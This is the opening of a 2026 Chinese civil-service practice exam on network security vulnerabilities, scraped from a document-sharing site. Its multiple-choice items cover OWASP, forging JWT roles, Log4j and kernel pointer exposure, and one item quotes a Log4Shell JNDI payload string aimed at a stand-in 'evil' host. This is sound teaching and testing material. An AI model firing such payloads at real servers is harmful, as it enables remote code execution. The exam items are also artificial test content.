- 1
- 0
- 约7.07千字
- 约 20页
- 2026-07-25 发布于四川
- 举报
2026年事业编计算机类网络安全漏洞分析专项试卷
一、单项选择题(每题1分,共20分。每题只有一个正确答案,请将正确选项的字母填在括号内)
1.在OWASPTop102021中,下列哪一类漏洞首次进入前十?
A.失效的访问控制
B.加密失败
C.不安全的设计
D.服务器端请求伪造(SSRF)
(?)
2.某Web应用使用JWT作为会话令牌,签名算法为`none`,攻击者通过修改payload中的`role`字段成功获得管理员权限。该漏洞属于:
A.跨站脚本(XSS)
B.不安全的反序列化
C.失效的访问控制
D.弱加密
(?)
3.下列关于Log4j2远程代码执行(CVE-2021-44228)的说法,错误的是:
A.漏洞根因是JNDI注入
B.仅影响Log4j1.x版本
C.攻击者可通过`${jndi:ldap://evil/a}`触发
D.2.15.0-rc1版本可被绕过
(?)
4.在Linux内核中,开启`kptr_restrict=0`会直接导致:
A.内核地址空间布局随机化(KASLR)失效
B.普通用户可读`/proc/kallsyms`中的内核符号地址
C.SMEP保护被关闭
D.SMAP保护被关闭
(?)
5.某HTTPS站点使用TLS1.3,握手阶段未发送`CertificateRequest`消息,则该站点:
A.一
您可能关注的文档
最近下载
- 植物纤维餐饮具干法成型工艺优化及成型设备研究.ppt VIP
- 西林变频器SD200说明书.pdf
- 2026重庆机电控股集团机电工程技术有限公司招聘18人备考题库及答案详解一套.docx VIP
- 游戏开发外包2025年合同合同.docx VIP
- DB13 5808-2023 餐饮业大气污染物排放标准.pdf VIP
- 三年级上册道德与法治第四单元《公共生活靠大家》教学设计.docx
- 教师到企业调研手册(文化基础课).pdf VIP
- 橡胶密封件试验报告(模板).doc VIP
- NCCN临床实践指南之睾丸癌(2026.V1)培训PPT课件PPT课件.pptx VIP
- 重症营养支持中国指南(2026版).docx
原创力文档

文档评论(0)